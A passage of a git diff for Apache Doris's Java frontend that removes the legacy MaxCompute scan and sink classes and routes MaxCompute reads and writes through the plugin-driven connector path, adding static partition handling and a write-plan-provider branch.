getOdpsTableTime = System.currentTimeMillis(); - LOG.info("MaxComputeScanNode getSplits: getOdpsTable cost {} ms", getOdpsTableTime - startTime); - - if (MaxComputeExternalTable.isUnsupportedOdpsTable(odpsTable)) { - throw new UserException("Reading MaxCompute external table or logical view is not supported: " - + table.getDbName() + "." + table.getName()); - } - - if (desc.getSlots().isEmpty() || odpsTable.getFileNum() <= 0) { - return result; - } - long getFileNumTime = System.currentTimeMillis(); - LOG.info("MaxComputeScanNode getSplits: getFileNum cost {} ms", getFileNumTime - getOdpsTableTime); - - createRequiredColumns(); - - List requiredPartitionSpecs = new ArrayList<>(); - //if requiredPartitionSpecs is empty, get all partition data. - if (!table.getPartitionColumns().isEmpty() && selectedPartitions != SelectedPartitions.NOT_PRUNED) { - this.totalPartitionNum = selectedPartitions.totalPartitionNum; - this.selectedPartitionNum = selectedPartitions.selectedPartitions.size(); - - if (selectedPartitions.selectedPartitions.isEmpty()) { - //no need read any partition data. - return result; - } - selectedPartitions.selectedPartitions.forEach( - (key, value) -> requiredPartitionSpecs.add(new PartitionSpec(key)) - ); - } - - try { - long beforeSession = System.currentTimeMillis(); - if (sessionVariable.enableMcLimitSplitOptimization - && onlyPartitionEqualityPredicate && hasLimit()) { - result = getSplitsWithLimitOptimization(requiredPartitionSpecs); - } else { - TableBatchReadSession tableBatchReadSession = createTableBatchReadSession(requiredPartitionSpecs); - long afterSession = System.currentTimeMillis(); - LOG.info("MaxComputeScanNode getSplits: createTableBatchReadSession cost {} ms, " - + "partitionSpecs size: {}", afterSession - beforeSession, requiredPartitionSpecs.size()); - - result = getSplitByTableSession(tableBatchReadSession); - long afterSplit = System.currentTimeMillis(); - LOG.info("MaxComputeScanNode getSplits: getSplitByTableSession cost {} ms, " - + "splits size: {}", afterSplit - afterSession, result.size()); - } - } catch (IOException e) { - throw new RuntimeException(e); - } - LOG.info("MaxComputeScanNode getSplits: total cost {} ms", System.currentTimeMillis() - startTime); - return result; - } - - private List getSplitsWithLimitOptimization( - List requiredPartitionSpecs) throws IOException { - long startTime = System.currentTimeMillis(); - - SplitOptions rowOffsetOptions = SplitOptions.newBuilder() - .SplitByRowOffset() - .withCrossPartition(false) - .build(); - - TableBatchReadSession tableBatchReadSession = - createTableBatchReadSession(requiredPartitionSpecs, rowOffsetOptions); - long afterSession = System.currentTimeMillis(); - LOG.info("MaxComputeScanNode getSplitsWithLimitOptimization: " - + "createTableBatchReadSession cost {} ms", afterSession - startTime); - - String scanSessionSerialize = serializeSession(tableBatchReadSession); - InputSplitAssigner assigner = tableBatchReadSession.getInputSplitAssigner(); - long totalRowCount = assigner.getTotalRowCount(); - - LOG.info("MaxComputeScanNode getSplitsWithLimitOptimization: " - + "totalRowCount={}, limit={}", totalRowCount, getLimit()); - - List result = new ArrayList<>(); - if (totalRowCount <= 0) { - return result; - } - - long rowsToRead = Math.min(getLimit(), totalRowCount); - long modificationTime = table.getOdpsTable().getLastDataModifiedTime().getTime(); - com.aliyun.odps.table.read.split.InputSplit split = - assigner.getSplitByRowOffset(0, rowsToRead); - - MaxComputeSplit maxComputeSplit = new MaxComputeSplit( - ROW_OFFSET_PATH, 0, rowsToRead, totalRowCount, - modificationTime, null, Collections.emptyList()); - maxComputeSplit.scanSerialize = scanSessionSerialize; - maxComputeSplit.splitType = SplitType.ROW_OFFSET; - maxComputeSplit.sessionId = split.getSessionId(); - result.add(maxComputeSplit); - - LOG.info("MaxComputeScanNode getSplitsWithLimitOptimization: " - + "total cost {} ms, 1 split with {} rows", - System.currentTimeMillis() - startTime, rowsToRead); - return result; - } - - private static String serializeSession(Serializable object) throws IOException { - ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); - ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream); - objectOutputStream.writeObject(object); - byte[] serializedBytes = byteArrayOutputStream.toByteArray(); - return Base64.getEncoder().encodeToString(serializedBytes); - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeSplit.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeSplit.java deleted file mode 100644 index 0fc9fbcbfd5f63..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeSplit.java +++ /dev/null @@ -1,47 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.maxcompute.source; - -import org.apache.doris.common.util.LocationPath; -import org.apache.doris.datasource.FileSplit; -import org.apache.doris.thrift.TFileType; - -import lombok.Getter; - -import java.util.List; - -@Getter -public class MaxComputeSplit extends FileSplit { - public String scanSerialize; - public String sessionId; - - public enum SplitType { - ROW_OFFSET, - BYTE_SIZE - } - - public SplitType splitType; - - public MaxComputeSplit(LocationPath path, long start, long length, long fileLength, - long modificationTime, String[] hosts, List partitionValues) { - super(path, start, length, fileLength, modificationTime, hosts, partitionValues); - // MC always use FILE_NET type - this.locationType = TFileType.FILE_NET; - } - -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/metacache/ExternalMetaCacheRouteResolver.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/metacache/ExternalMetaCacheRouteResolver.java index 48bde1ab99311f..16576ea350005e 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/metacache/ExternalMetaCacheRouteResolver.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/metacache/ExternalMetaCacheRouteResolver.java @@ -22,7 +22,6 @@ import org.apache.doris.datasource.doris.RemoteDorisExternalCatalog; import org.apache.doris.datasource.hive.HMSExternalCatalog; import org.apache.doris.datasource.iceberg.IcebergExternalCatalog; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; import org.apache.doris.datasource.paimon.PaimonExternalCatalog; import java.util.ArrayList; @@ -40,7 +39,6 @@ public class ExternalMetaCacheRouteResolver { private static final String ENGINE_HUDI = "hudi"; private static final String ENGINE_ICEBERG = "iceberg"; private static final String ENGINE_PAIMON = "paimon"; - private static final String ENGINE_MAXCOMPUTE = "maxcompute"; private static final String ENGINE_DORIS = "doris"; private final ExternalMetaCacheRegistry registry; @@ -72,10 +70,6 @@ private void addBuiltinRoutes(Set resolved, CatalogIf cata resolved.add(registry.resolve(ENGINE_PAIMON)); return; } - if (catalog instanceof MaxComputeExternalCatalog) { - resolved.add(registry.resolve(ENGINE_MAXCOMPUTE)); - return; - } if (catalog instanceof RemoteDorisExternalCatalog) { resolved.add(registry.resolve(ENGINE_DORIS)); return; diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/analyzer/UnboundConnectorTableSink.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/analyzer/UnboundConnectorTableSink.java index b9d620a1bd580f..44113fd6fd618a 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/analyzer/UnboundConnectorTableSink.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/analyzer/UnboundConnectorTableSink.java @@ -19,6 +19,7 @@ import org.apache.doris.nereids.memo.GroupExpression; import org.apache.doris.nereids.properties.LogicalProperties; +import org.apache.doris.nereids.trees.expressions.Expression; import org.apache.doris.nereids.trees.plans.Plan; import org.apache.doris.nereids.trees.plans.PlanType; import org.apache.doris.nereids.trees.plans.commands.info.DMLCommandType; @@ -26,8 +27,10 @@ import com.google.common.base.Preconditions; import com.google.common.collect.ImmutableList; +import com.google.common.collect.ImmutableMap; import java.util.List; +import java.util.Map; import java.util.Optional; /** @@ -36,14 +39,31 @@ */ public class UnboundConnectorTableSink extends UnboundBaseExternalTableSink { + // Static partition spec from INSERT ... PARTITION(col=val); null when none. Mirrors + // UnboundMaxComputeTableSink so plugin-driven MaxCompute keeps static-partition / overwrite + // semantics after the cutover. Consumed via the PluginDrivenInsertCommandContext. + private final Map staticPartitionKeyValues; + public UnboundConnectorTableSink(List nameParts, List colNames, List hints, List partitions, CHILD_TYPE child) { this(nameParts, colNames, hints, partitions, DMLCommandType.NONE, - Optional.empty(), Optional.empty(), child); + Optional.empty(), Optional.empty(), child, null); + } + + public UnboundConnectorTableSink(List nameParts, + List colNames, + List hints, + List partitions, + DMLCommandType dmlCommandType, + Optional groupExpression, + Optional logicalProperties, + CHILD_TYPE child) { + this(nameParts, colNames, hints, partitions, dmlCommandType, + groupExpression, logicalProperties, child, null); } /** - * constructor + * constructor with static partition */ public UnboundConnectorTableSink(List nameParts, List colNames, @@ -52,9 +72,21 @@ public UnboundConnectorTableSink(List nameParts, DMLCommandType dmlCommandType, Optional groupExpression, Optional logicalProperties, - CHILD_TYPE child) { + CHILD_TYPE child, + Map staticPartitionKeyValues) { super(nameParts, PlanType.LOGICAL_UNBOUND_CONNECTOR_TABLE_SINK, ImmutableList.of(), groupExpression, logicalProperties, colNames, dmlCommandType, child, hints, partitions); + this.staticPartitionKeyValues = staticPartitionKeyValues != null + ? ImmutableMap.copyOf(staticPartitionKeyValues) + : null; + } + + public Map getStaticPartitionKeyValues() { + return staticPartitionKeyValues; + } + + public boolean hasStaticPartition() { + return staticPartitionKeyValues != null && !staticPartitionKeyValues.isEmpty(); } @Override @@ -67,19 +99,20 @@ public Plan withChildren(List children) { Preconditions.checkArgument(children.size() == 1, "UnboundConnectorTableSink only accepts one child"); return new UnboundConnectorTableSink<>(nameParts, colNames, hints, partitions, - dmlCommandType, groupExpression, Optional.empty(), children.get(0)); + dmlCommandType, groupExpression, Optional.empty(), children.get(0), staticPartitionKeyValues); } @Override public Plan withGroupExpression(Optional groupExpression) { return new UnboundConnectorTableSink<>(nameParts, colNames, hints, partitions, - dmlCommandType, groupExpression, Optional.of(getLogicalProperties()), child()); + dmlCommandType, groupExpression, Optional.of(getLogicalProperties()), child(), + staticPartitionKeyValues); } @Override public Plan withGroupExprLogicalPropChildren(Optional groupExpression, Optional logicalProperties, List children) { return new UnboundConnectorTableSink<>(nameParts, colNames, hints, partitions, - dmlCommandType, groupExpression, logicalProperties, children.get(0)); + dmlCommandType, groupExpression, logicalProperties, children.get(0), staticPartitionKeyValues); } } diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/analyzer/UnboundMaxComputeTableSink.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/analyzer/UnboundMaxComputeTableSink.java deleted file mode 100644 index bb397a6bc35a19..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/analyzer/UnboundMaxComputeTableSink.java +++ /dev/null @@ -1,117 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.nereids.analyzer; - -import org.apache.doris.nereids.memo.GroupExpression; -import org.apache.doris.nereids.properties.LogicalProperties; -import org.apache.doris.nereids.trees.expressions.Expression; -import org.apache.doris.nereids.trees.plans.Plan; -import org.apache.doris.nereids.trees.plans.PlanType; -import org.apache.doris.nereids.trees.plans.commands.info.DMLCommandType; -import org.apache.doris.nereids.trees.plans.visitor.PlanVisitor; - -import com.google.common.base.Preconditions; -import com.google.common.collect.ImmutableList; -import com.google.common.collect.ImmutableMap; - -import java.util.List; -import java.util.Map; -import java.util.Optional; - -/** - * Represent a MaxCompute table sink plan node that has not been bound. - */ -public class UnboundMaxComputeTableSink extends UnboundBaseExternalTableSink { - - private final Map staticPartitionKeyValues; - - public UnboundMaxComputeTableSink(List nameParts, List colNames, List hints, - List partitions, CHILD_TYPE child) { - this(nameParts, colNames, hints, partitions, DMLCommandType.NONE, - Optional.empty(), Optional.empty(), child, null); - } - - /** - * constructor - */ - public UnboundMaxComputeTableSink(List nameParts, - List colNames, - List hints, - List partitions, - DMLCommandType dmlCommandType, - Optional groupExpression, - Optional logicalProperties, - CHILD_TYPE child) { - this(nameParts, colNames, hints, partitions, dmlCommandType, - groupExpression, logicalProperties, child, null); - } - - /** - * constructor with static partition - */ - public UnboundMaxComputeTableSink(List nameParts, - List colNames, - List hints, - List partitions, - DMLCommandType dmlCommandType, - Optional groupExpression, - Optional logicalProperties, - CHILD_TYPE child, - Map staticPartitionKeyValues) { - super(nameParts, PlanType.LOGICAL_UNBOUND_MAX_COMPUTE_TABLE_SINK, ImmutableList.of(), groupExpression, - logicalProperties, colNames, dmlCommandType, child, hints, partitions); - this.staticPartitionKeyValues = staticPartitionKeyValues != null - ? ImmutableMap.copyOf(staticPartitionKeyValues) - : null; - } - - public Map getStaticPartitionKeyValues() { - return staticPartitionKeyValues; - } - - public boolean hasStaticPartition() { - return staticPartitionKeyValues != null && !staticPartitionKeyValues.isEmpty(); - } - - @Override - public Plan withChildren(List children) { - Preconditions.checkArgument(children.size() == 1, - "UnboundMaxComputeTableSink only accepts one child"); - return new UnboundMaxComputeTableSink<>(nameParts, colNames, hints, partitions, - dmlCommandType, groupExpression, Optional.empty(), children.get(0), staticPartitionKeyValues); - } - - @Override - public R accept(PlanVisitor visitor, C context) { - return visitor.visitUnboundMaxComputeTableSink(this, context); - } - - @Override - public Plan withGroupExpression(Optional groupExpression) { - return new UnboundMaxComputeTableSink<>(nameParts, colNames, hints, partitions, - dmlCommandType, groupExpression, Optional.of(getLogicalProperties()), child(), - staticPartitionKeyValues); - } - - @Override - public Plan withGroupExprLogicalPropChildren(Optional groupExpression, - Optional logicalProperties, List children) { - return new UnboundMaxComputeTableSink<>(nameParts, colNames, hints, partitions, - dmlCommandType, groupExpression, logicalProperties, children.get(0), staticPartitionKeyValues); - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/analyzer/UnboundTableSinkCreator.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/analyzer/UnboundTableSinkCreator.java index ff0cfc71264a12..cd42aa45ea546a 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/analyzer/UnboundTableSinkCreator.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/analyzer/UnboundTableSinkCreator.java @@ -25,7 +25,6 @@ import org.apache.doris.datasource.doris.RemoteDorisExternalCatalog; import org.apache.doris.datasource.hive.HMSExternalCatalog; import org.apache.doris.datasource.iceberg.IcebergExternalCatalog; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; import org.apache.doris.dictionary.Dictionary; import org.apache.doris.nereids.exceptions.AnalysisException; import org.apache.doris.nereids.exceptions.ParseException; @@ -63,8 +62,6 @@ public static LogicalSink createUnboundTableSink(List na return new UnboundHiveTableSink<>(nameParts, colNames, hints, partitions, query); } else if (curCatalog instanceof IcebergExternalCatalog) { return new UnboundIcebergTableSink<>(nameParts, colNames, hints, partitions, query); - } else if (curCatalog instanceof MaxComputeExternalCatalog) { - return new UnboundMaxComputeTableSink<>(nameParts, colNames, hints, partitions, query); } else if (curCatalog instanceof PluginDrivenExternalCatalog) { return new UnboundConnectorTableSink<>(nameParts, colNames, hints, partitions, query); } @@ -102,12 +99,9 @@ public static LogicalSink createUnboundTableSink(List na } else if (curCatalog instanceof IcebergExternalCatalog) { return new UnboundIcebergTableSink<>(nameParts, colNames, hints, partitions, dmlCommandType, Optional.empty(), Optional.empty(), plan, staticPartitionKeyValues, false); - } else if (curCatalog instanceof MaxComputeExternalCatalog) { - return new UnboundMaxComputeTableSink<>(nameParts, colNames, hints, partitions, - dmlCommandType, Optional.empty(), Optional.empty(), plan, staticPartitionKeyValues); } else if (curCatalog instanceof PluginDrivenExternalCatalog) { return new UnboundConnectorTableSink<>(nameParts, colNames, hints, partitions, - dmlCommandType, Optional.empty(), Optional.empty(), plan); + dmlCommandType, Optional.empty(), Optional.empty(), plan, staticPartitionKeyValues); } throw new RuntimeException("Load data to " + curCatalog.getClass().getSimpleName() + " is not supported."); } @@ -143,12 +137,9 @@ public static LogicalSink createUnboundTableSinkMaybeOverwrite(L } else if (curCatalog instanceof IcebergExternalCatalog && !isAutoDetectPartition) { return new UnboundIcebergTableSink<>(nameParts, colNames, hints, partitions, dmlCommandType, Optional.empty(), Optional.empty(), plan, staticPartitionKeyValues, false); - } else if (curCatalog instanceof MaxComputeExternalCatalog && !isAutoDetectPartition) { - return new UnboundMaxComputeTableSink<>(nameParts, colNames, hints, partitions, - dmlCommandType, Optional.empty(), Optional.empty(), plan, staticPartitionKeyValues); } else if (curCatalog instanceof PluginDrivenExternalCatalog && !isAutoDetectPartition) { return new UnboundConnectorTableSink<>(nameParts, colNames, hints, partitions, - dmlCommandType, Optional.empty(), Optional.empty(), plan); + dmlCommandType, Optional.empty(), Optional.empty(), plan, staticPartitionKeyValues); } throw new AnalysisException( diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java index f9b16736da5014..ea7b440dee005c 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java @@ -50,6 +50,7 @@ import org.apache.doris.connector.api.ConnectorType; import org.apache.doris.connector.api.handle.ConnectorTableHandle; import org.apache.doris.connector.api.write.ConnectorWriteConfig; +import org.apache.doris.connector.api.write.ConnectorWritePlanProvider; import org.apache.doris.datasource.ExternalTable; import org.apache.doris.datasource.FileQueryScanNode; import org.apache.doris.datasource.PluginDrivenExternalCatalog; @@ -68,8 +69,6 @@ import org.apache.doris.datasource.iceberg.source.IcebergScanNode; import org.apache.doris.datasource.lakesoul.LakeSoulExternalTable; import org.apache.doris.datasource.lakesoul.source.LakeSoulScanNode; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalTable; -import org.apache.doris.datasource.maxcompute.source.MaxComputeScanNode; import org.apache.doris.datasource.paimon.source.PaimonScanNode; import org.apache.doris.fs.DirectoryLister; import org.apache.doris.fs.FileSystemDirectoryLister; @@ -146,7 +145,6 @@ import org.apache.doris.nereids.trees.plans.physical.PhysicalLazyMaterializeOlapScan; import org.apache.doris.nereids.trees.plans.physical.PhysicalLazyMaterializeTVFScan; import org.apache.doris.nereids.trees.plans.physical.PhysicalLimit; -import org.apache.doris.nereids.trees.plans.physical.PhysicalMaxComputeTableSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalNestedLoopJoin; import org.apache.doris.nereids.trees.plans.physical.PhysicalOlapScan; import org.apache.doris.nereids.trees.plans.physical.PhysicalOlapTableSink; @@ -205,7 +203,6 @@ import org.apache.doris.planner.IntersectNode; import org.apache.doris.planner.JoinNodeBase; import org.apache.doris.planner.MaterializationNode; -import org.apache.doris.planner.MaxComputeTableSink; import org.apache.doris.planner.MultiCastDataSink; import org.apache.doris.planner.MultiCastPlanFragment; import org.apache.doris.planner.NestedLoopJoinNode; @@ -588,17 +585,6 @@ public PlanFragment visitPhysicalIcebergTableSink(PhysicalIcebergTableSink mcTableSink, - PlanTranslatorContext context) { - PlanFragment rootFragment = mcTableSink.child().accept(this, context); - rootFragment.setOutputPartition(DataPartition.UNPARTITIONED); - MaxComputeTableSink sink = new MaxComputeTableSink( - (MaxComputeExternalTable) mcTableSink.getTargetTable()); - rootFragment.setSink(sink); - return rootFragment; - } - @Override public PlanFragment visitPhysicalIcebergDeleteSink(PhysicalIcebergDeleteSink icebergDeleteSink, PlanTranslatorContext context) { @@ -664,6 +650,23 @@ public PlanFragment visitPhysicalConnectorTableSink( null, col.isAllowNull(), null)) .collect(java.util.stream.Collectors.toList()); + // W5: connectors with a write-plan provider build their own opaque TDataSink (the + // general path for maxcompute / iceberg). Dormant until a connector overrides + // Connector.getWritePlanProvider(); the config-bag path below is unchanged (jdbc). + ConnectorWritePlanProvider writePlanProvider = connector.getWritePlanProvider(); + if (writePlanProvider != null) { + ConnectorTableHandle providerTableHandle = metadata.getTableHandle(connSession, + targetTable.getRemoteDbName(), targetTable.getRemoteName()) + .orElseThrow(() -> new AnalysisException( + "Table not found: " + targetTable.getRemoteDbName() + + "." + targetTable.getRemoteName() + + " in catalog " + catalog.getName())); + PluginDrivenTableSink providerSink = new PluginDrivenTableSink(targetTable, + writePlanProvider, connSession, providerTableHandle, connectorColumns); + rootFragment.setSink(providerSink); + return rootFragment; + } + ConnectorWriteConfig writeConfig; if (metadata.supportsInsert()) { ConnectorTableHandle tableHandle = metadata.getTableHandle(connSession, @@ -735,9 +738,13 @@ public PlanFragment visitPhysicalFileScan(PhysicalFileScan fileScan, PlanTransla if (table instanceof PluginDrivenExternalTable) { PluginDrivenExternalCatalog pluginCatalog = (PluginDrivenExternalCatalog) table.getCatalog(); - scanNode = PluginDrivenScanNode.create(context.nextPlanNodeId(), tupleDescriptor, - false, sv, context.getScanContext(), pluginCatalog, + PluginDrivenScanNode pluginScanNode = PluginDrivenScanNode.create(context.nextPlanNodeId(), + tupleDescriptor, false, sv, context.getScanContext(), pluginCatalog, ((PluginDrivenExternalTable) table)); + // Forward the pruned partitions so the connector reads only the surviving partitions + // (mirrors the legacy MaxCompute / Hive branches below). + pluginScanNode.setSelectedPartitions(fileScan.getSelectedPartitions()); + scanNode = pluginScanNode; } else if (table instanceof HMSExternalTable) { if (directoryLister == null) { this.directoryLister = new TransactionScopeCachingDirectoryListerFactory( @@ -774,9 +781,6 @@ public PlanFragment visitPhysicalFileScan(PhysicalFileScan fileScan, PlanTransla } else if (table.getType() == TableIf.TableType.PAIMON_EXTERNAL_TABLE) { scanNode = new PaimonScanNode(context.nextPlanNodeId(), tupleDescriptor, false, sv, context.getScanContext()); - } else if (table instanceof MaxComputeExternalTable) { - scanNode = new MaxComputeScanNode(context.nextPlanNodeId(), tupleDescriptor, - fileScan.getSelectedPartitions(), false, sv, context.getScanContext()); } else if (table instanceof LakeSoulExternalTable) { scanNode = new LakeSoulScanNode(context.nextPlanNodeId(), tupleDescriptor, false, sv, context.getScanContext()); diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/processor/post/ShuffleKeyPruner.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/processor/post/ShuffleKeyPruner.java index 0f5453b16fde46..3b0e773ae79fdd 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/processor/post/ShuffleKeyPruner.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/processor/post/ShuffleKeyPruner.java @@ -44,7 +44,6 @@ import org.apache.doris.nereids.trees.plans.physical.PhysicalHiveTableSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalIcebergTableSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalLimit; -import org.apache.doris.nereids.trees.plans.physical.PhysicalMaxComputeTableSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalNestedLoopJoin; import org.apache.doris.nereids.trees.plans.physical.PhysicalOlapTableSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalPartitionTopN; @@ -268,20 +267,6 @@ public Plan visitPhysicalIcebergTableSink( return rewriteUnary(icebergTableSink, ctx.withAllowShuffleKeyPrune(childAllowShuffleKeyPrune)); } - @Override - public Plan visitPhysicalMaxComputeTableSink( - PhysicalMaxComputeTableSink mcTableSink, PruneCtx ctx) { - boolean childAllowShuffleKeyPrune; - if (ctx.cascadesContext.getConnectContext() != null - && !ctx.cascadesContext.getConnectContext().getSessionVariable().enableStrictConsistencyDml) { - childAllowShuffleKeyPrune = true; - } else { - childAllowShuffleKeyPrune = mcTableSink.getRequirePhysicalProperties().equals( - PhysicalProperties.ANY); - } - return rewriteUnary(mcTableSink, ctx.withAllowShuffleKeyPrune(childAllowShuffleKeyPrune)); - } - @Override public Plan visitPhysicalConnectorTableSink( PhysicalConnectorTableSink connectorSink, PruneCtx ctx) { diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/processor/pre/TurnOffPageCacheForInsertIntoSelect.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/processor/pre/TurnOffPageCacheForInsertIntoSelect.java index 8abd1094b3ca05..ab817c2f1d7c56 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/processor/pre/TurnOffPageCacheForInsertIntoSelect.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/processor/pre/TurnOffPageCacheForInsertIntoSelect.java @@ -26,7 +26,6 @@ import org.apache.doris.nereids.trees.plans.logical.LogicalFileSink; import org.apache.doris.nereids.trees.plans.logical.LogicalHiveTableSink; import org.apache.doris.nereids.trees.plans.logical.LogicalIcebergTableSink; -import org.apache.doris.nereids.trees.plans.logical.LogicalMaxComputeTableSink; import org.apache.doris.nereids.trees.plans.logical.LogicalOlapTableSink; import org.apache.doris.qe.SessionVariable; import org.apache.doris.qe.VariableMgr; @@ -68,13 +67,6 @@ public Plan visitLogicalIcebergTableSink( return tableSink; } - @Override - public Plan visitLogicalMaxComputeTableSink( - LogicalMaxComputeTableSink tableSink, StatementContext context) { - turnOffPageCache(context); - return tableSink; - } - private void turnOffPageCache(StatementContext context) { SessionVariable sessionVariable = context.getConnectContext().getSessionVariable(); // set temporary session value, and then revert value in the 'finally block' of StmtExecutor#execute diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/properties/RequestPropertyDeriver.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/properties/RequestPropertyDeriver.java index 70f2b51665b740..686aa396797c84 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/properties/RequestPropertyDeriver.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/properties/RequestPropertyDeriver.java @@ -52,7 +52,6 @@ import org.apache.doris.nereids.trees.plans.physical.PhysicalIcebergMergeSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalIcebergTableSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalLimit; -import org.apache.doris.nereids.trees.plans.physical.PhysicalMaxComputeTableSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalNestedLoopJoin; import org.apache.doris.nereids.trees.plans.physical.PhysicalOlapTableSink; import org.apache.doris.nereids.trees.plans.physical.PhysicalPartitionTopN; @@ -176,17 +175,6 @@ public Void visitPhysicalIcebergTableSink( return null; } - @Override - public Void visitPhysicalMaxComputeTableSink( - PhysicalMaxComputeTableSink mcTableSink, PlanContext context) { - if (connectContext != null && !connectContext.getSessionVariable().isEnableStrictConsistencyDml()) { - addRequestPropertyToChildren(PhysicalProperties.ANY); - } else { - addRequestPropertyToChildren(mcTableSink.getRequirePhysicalProperties()); - } - return null; - } - @Override public Void visitPhysicalIcebergDeleteSink( PhysicalIcebergDeleteSink icebergDeleteSink, PlanContext context) { diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/RuleSet.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/RuleSet.java index 1da55e384dfd92..ed3e80f800d12b 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/RuleSet.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/RuleSet.java @@ -80,7 +80,6 @@ import org.apache.doris.nereids.rules.implementation.LogicalJoinToHashJoin; import org.apache.doris.nereids.rules.implementation.LogicalJoinToNestedLoopJoin; import org.apache.doris.nereids.rules.implementation.LogicalLimitToPhysicalLimit; -import org.apache.doris.nereids.rules.implementation.LogicalMaxComputeTableSinkToPhysicalMaxComputeTableSink; import org.apache.doris.nereids.rules.implementation.LogicalOdbcScanToPhysicalOdbcScan; import org.apache.doris.nereids.rules.implementation.LogicalOlapScanToPhysicalOlapScan; import org.apache.doris.nereids.rules.implementation.LogicalOlapTableSinkToPhysicalOlapTableSink; @@ -230,7 +229,6 @@ public class RuleSet { .add(new LogicalOlapTableSinkToPhysicalOlapTableSink()) .add(new LogicalHiveTableSinkToPhysicalHiveTableSink()) .add(new LogicalIcebergTableSinkToPhysicalIcebergTableSink()) - .add(new LogicalMaxComputeTableSinkToPhysicalMaxComputeTableSink()) .add(new LogicalIcebergDeleteSinkToPhysicalIcebergDeleteSink()) .add(new LogicalIcebergMergeSinkToPhysicalIcebergMergeSink()) .add(new LogicalConnectorTableSinkToPhysicalConnectorTableSink()) @@ -278,7 +276,6 @@ public class RuleSet { .add(new LogicalOlapTableSinkToPhysicalOlapTableSink()) .add(new LogicalHiveTableSinkToPhysicalHiveTableSink()) .add(new LogicalIcebergTableSinkToPhysicalIcebergTableSink()) - .add(new LogicalMaxComputeTableSinkToPhysicalMaxComputeTableSink()) .add(new LogicalIcebergDeleteSinkToPhysicalIcebergDeleteSink()) .add(new LogicalIcebergMergeSinkToPhysicalIcebergMergeSink()) .add(new LogicalConnectorTableSinkToPhysicalConnectorTableSink()) diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/analysis/BindSink.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/analysis/BindSink.java index d7da7498ba70a8..d73df589c784bd 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/analysis/BindSink.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/rules/analysis/BindSink.java @@ -42,8 +42,6 @@ import 